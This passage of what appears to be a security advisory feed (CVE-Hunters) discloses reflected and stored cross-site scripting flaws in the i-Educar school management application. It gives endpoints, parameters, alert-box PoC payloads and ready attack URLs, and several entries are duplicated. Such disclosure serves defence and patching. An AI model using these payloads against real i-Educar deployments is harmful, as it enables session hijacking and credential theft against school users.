hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8367.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8367.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8368/ https://www.cvehunters.com/p/cve-2025-8368/ <h2 id="cve-2025-8368-multiples-cross-site-scripting-xss-reflected-in-endpoint-pesquisa_pessoa_lstphp">CVE-2025-8368: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>pesquisa_pessoa_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8368" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8368</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>pesquisa_pessoa_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>campo_busca</code> and <code>cpf</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>pesquisa_pessoa_lst.php</code></p> <p>Parameters: <code>campo_busca</code> and <code>cpf</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span><span class="o">%</span><span class="mi">3</span><span class="nx">Cscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">Ealert</span><span class="o">%</span><span class="mi">28</span><span class="o">%</span><span class="mi">27</span><span class="nx">XSS</span><span class="o">-</span><span class="nx">PoC</span><span class="o">%</span><span class="mi">27</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="nx">C</span><span class="o">%</span><span class="mi">2</span><span class="nx">Fscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8368/image.png" width="1527" height="499" srcset="/p/cve-2025-8368/image_hu_ed5558ad0fc1df7d.png 480w, /p/cve-2025-8368/image_hu_9f69f1446734701d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="306" data-flex-basis="734px" ></p> <p style="text-align: justify;">This payload can be injected into either of the two parameters. Example attack URLs:</p><h2 id="cve-2025-8368-multiples-cross-site-scripting-xss-reflected-in-endpoint-pesquisa_pessoa_lstphp">CVE-2025-8368: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>pesquisa_pessoa_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8368" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8368</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>pesquisa_pessoa_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>campo_busca</code> and <code>cpf</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>pesquisa_pessoa_lst.php</code></p> <p>Parameters: <code>campo_busca</code> and <code>cpf</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span><span class="o">%</span><span class="mi">3</span><span class="nx">Cscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">Ealert</span><span class="o">%</span><span class="mi">28</span><span class="o">%</span><span class="mi">27</span><span class="nx">XSS</span><span class="o">-</span><span class="nx">PoC</span><span class="o">%</span><span class="mi">27</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="nx">C</span><span class="o">%</span><span class="mi">2</span><span class="nx">Fscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8368/image.png" width="1527" height="499" srcset="/p/cve-2025-8368/image_hu_ed5558ad0fc1df7d.png 480w, /p/cve-2025-8368/image_hu_9f69f1446734701d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="306" data-flex-basis="734px" /></p> <p style="text-align: justify;">This payload can be injected into either of the two parameters. Example attack URLs:</p> <h4 id="parameter-campo_busca">Parameter <code>campo_busca</code> </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> /intranet/pesquisa_pessoa_lst.php?campo_busca=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E </span></span></code></pre></td></tr></table> </div> </div><h4 id="parameter-cpf">Parameter <code>cpf</code> </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> /intranet/pesquisa_pessoa_lst.php?cpf=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E </span></span></code></pre></td></tr></table> </div> </div><h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8368.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8368.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8369/ https://www.cvehunters.com/p/cve-2025-8369/ <h2 id="cve-2025-8369-cross-site-scripting-xss-reflected-in-endpoint-educar_avaliacao_desempenho_lstphp-parameter-titulo_avaliacao">CVE-2025-8369: Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_avaliacao_desempenho_lst.php</code> parameter <code>titulo_avaliacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8369" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8369</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_avaliacao_desempenho_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>titulo_avaliacao</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_avaliacao_desempenho_lst.php</code></p> <p>Parameter: <code>titulo_avaliacao</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><h4 id="encoded">Encoded </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span><span class="o">%</span><span class="mi">3</span><span class="nx">Cscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">Ealert</span><span class="o">%</span><span class="mi">28</span><span class="o">%</span><span class="mi">27</span><span class="nx">XSS</span><span class="o">-</span><span class="nx">PoC</span><span class="o">%</span><span class="mi">27</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="nx">C</span><span class="o">%</span><span class="mi">2</span><span class="nx">Fscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="decoded">Decoded </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8369/image.png" width="724" height="774" srcset="/p/cve-2025-8369/image_hu_f2d2374689b068fc.png 480w, /p/cve-2025-8369/image_hu_e432fb0e1e210761.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="93" data-flex-basis="224px" ></p> <h3 id="url">URL </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> /intranet/educar_avaliacao_desempenho_lst.php?titulo_avaliacao=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">When a user accesses this crafted URL, the script is executed immediately in the browser, confirming the vulnerability.</p><h2 id="cve-2025-8369-cross-site-scripting-xss-reflected-in-endpoint-educar_avaliacao_desempenho_lstphp-parameter-titulo_avaliacao">CVE-2025-8369: Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_avaliacao_desempenho_lst.php</code> parameter <code>titulo_avaliacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8369" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8369</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_avaliacao_desempenho_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>titulo_avaliacao</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_avaliacao_desempenho_lst.php</code></p> <p>Parameter: <code>titulo_avaliacao</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><h4 id="encoded">Encoded </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span><span class="o">%</span><span class="mi">3</span><span class="nx">Cscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">Ealert</span><span class="o">%</span><span class="mi">28</span><span class="o">%</span><span class="mi">27</span><span class="nx">XSS</span><span class="o">-</span><span class="nx">PoC</span><span class="o">%</span><span class="mi">27</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="nx">C</span><span class="o">%</span><span class="mi">2</span><span class="nx">Fscript</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="decoded">Decoded </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8369/image.png" width="724" height="774" srcset="/p/cve-2025-8369/image_hu_f2d2374689b068fc.png 480w, /p/cve-2025-8369/image_hu_e432fb0e1e210761.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="93" data-flex-basis="224px" /></p> <h3 id="url">URL </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> /intranet/educar_avaliacao_desempenho_lst.php?titulo_avaliacao=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">When a user accesses this crafted URL, the script is executed immediately in the browser, confirming the vulnerability.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8369.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8370/ https://www.cvehunters.com/p/cve-2025-8370/ <h2 id="cve-2025-8370-cross-site-scripting-xss-reflected-in-endpoint-educar_escolaridade_lstphp-parameter-descricao">CVE-2025-8370: Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_escolaridade_lst.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8370" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8370</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_escolaridade_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_escolaridade_lst.php</code></p> <p>Parameter: <code>descricao</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8370/image.png" width="877" height="800" srcset="/p/cve-2025-8370/image_hu_5f218bc04c4efbce.png 480w, /p/cve-2025-8370/image_hu_61d9d458bc662e2e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="109" data-flex-basis="263px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-8370-cross-site-scripting-xss-reflected-in-endpoint-educar_escolaridade_lstphp-parameter-descricao">CVE-2025-8370: Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_escolaridade_lst.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8370" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8370</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_escolaridade_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_escolaridade_lst.php</code></p> <p>Parameter: <code>descricao</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8370/image.png" width="877" height="800" srcset="/p/cve-2025-8370/image_hu_5f218bc04c4efbce.png 480w, /p/cve-2025-8370/image_hu_61d9d458bc662e2e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="109" data-flex-basis="263px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8370.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8370.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7866/ https://www.cvehunters.com/p/cve-2025-7866/ <h2 id="cve-2025-7866-cross-site-scripting-xss-stored-endpoint-educar_deficiencia_lstphp-parameter-cod_deficiencia">CVE-2025-7866: Cross-Site Scripting (XSS) Stored endpoint <code>educar_deficiencia_lst.php</code> parameter <code>cod_deficiencia</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7866" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7866</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_deficiencia_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>cod_deficiencia</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_deficiencia_lst.php</code></p><h2 id="cve-2025-7866-cross-site-scripting-xss-stored-endpoint-educar_deficiencia_lstphp-parameter-cod_deficiencia">CVE-2025-7866: Cross-Site Scripting (XSS) Stored endpoint <code>educar_deficiencia_lst.php</code> parameter <code>cod_deficiencia</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7866" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7866</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_deficiencia_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>cod_deficiencia</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_deficiencia_lst.php</code></p> <p>Parameter: <code>cod_deficiencia</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>cod_deficiencia</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7866/image.png" width="1905" height="1110" srcset="/p/cve-2025-7866/image_hu_646e3b277d6607bd.png 480w, /p/cve-2025-7866/image_hu_d58317a6e86cd50.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="171" data-flex-basis="411px" /></p> <p><img src="/p/cve-2025-7866/image-1.png" width="1859" height="1070" srcset="/p/cve-2025-7866/image-1_hu_88404b61f892a24.png 480w, /p/cve-2025-7866/image-1_hu_8ce0f4ae80111656.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="173" data-flex-basis="416px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/2N25n832O88" target="_blank" rel="noopener" >https://youtu.be/2N25n832O88</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7866.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7866.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7867/ https://www.cvehunters.com/p/cve-2025-7867/ <h2 id="cve-2025-7867-cross-site-scripting-xss-stored-endpoint-agendaphp-parameter-agenda_rap_titulo">CVE-2025-7867: Cross-Site Scripting (XSS) Stored endpoint <code>agenda.php</code> parameter <code>agenda_rap_titulo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7867" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7867</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>agenda.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>agenda_rap_titulo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>agenda.php</code></p><h2 id="cve-2025-7867-cross-site-scripting-xss-stored-endpoint-agendaphp-parameter-agenda_rap_titulo">CVE-2025-7867: Cross-Site Scripting (XSS) Stored endpoint <code>agenda.php</code> parameter <code>agenda_rap_titulo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7867" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7867</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>agenda.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>agenda_rap_titulo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>agenda.php</code></p> <p>Parameter: <code>agenda_rap_titulo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>agenda_rap_titulo</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td 